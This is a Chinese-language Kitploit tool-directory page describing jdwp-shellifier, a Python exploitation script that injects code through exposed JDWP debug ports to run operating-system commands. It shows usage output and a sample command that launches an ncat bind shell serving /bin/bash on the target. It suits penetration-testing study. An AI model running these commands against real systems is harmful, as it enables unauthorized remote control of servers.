Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
jdwp-shellifier — 用于利用暴露的 Java 调试线协议 (JDWP) 服务的利用脚本,使渗透测试人员能够向目标 JVM 注入 Java 代码并执行任意操作系统命令。 | Kitploit
工具/GitHubGitHub/ioactive/jdwp-shellifier
漏洞利用调试器渗透测试错误配置
GitHubioactive/jdwp-shellifier

jdwp-shellifier

用于利用暴露的 Java 调试线协议 (JDWP) 服务的利用脚本,使渗透测试人员能够向目标 JVM 注入 Java 代码并执行任意操作系统命令。

查看仓库
91728939年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

JDWP 利用脚本

它是什么?

此漏洞利用脚本供渗透测试人员针对处于活动状态的 JDWP 服务使用,以获取远程代码执行(Remote Code Execution)能力。

它是如何工作的?

嗯,其工作方式相当标准,脚本只需要一个 Python 2 解释器:

root@kitploit:~
% python ./jdwp-shellifier.py -h
usage: jdwp-shellifier.py [-h] -t IP [-p PORT] [--break-on JAVA_METHOD]
                      [--cmd COMMAND]

Universal exploitation script for JDWP by @_hugsy_

optional arguments:
-h, --help            show this help message and exit
-t IP, --target IP    Remote target IP (default: None)
-p PORT, --port PORT  Remote target port (default: 8000)
--break-on JAVA_METHOD
Specify full path to method to break on (default:
	java.net.ServerSocket.accept)
	--cmd COMMAND         Specify full path to method to break on (default:
		None)

针对特定主机/端口:

root@kitploit:~
$ python ./jdwp-shellifier.py -t my.target.ip -p 1234

此命令仅会在 JVM 上注入 Java 代码,并显示一些信息,如操作系统、Java 版本等。由于它不会执行外部代码/二进制文件,因此完全安全,可将其用作概念验证(Proof-Of-Concept)。

root@kitploit:~
$ python ./jdwp-shellifier.py -t my.target.ip -p 1234 --cmd "ncat -v -l -p 1234 -e /bin/bash"

此命令将实际执行进程 ncat,并使用指定的参数,以运行中 JVM 所赋予的权限来执行。

在提问之前,请务必阅读 http://blog.ioactive.com/2014/04/hacking-java-debug-wire-protocol-or-how.html ,以全面了解 JDWP 协议。

致谢

  • Ilja Van Sprundel
  • Sebastien Macke
下载工具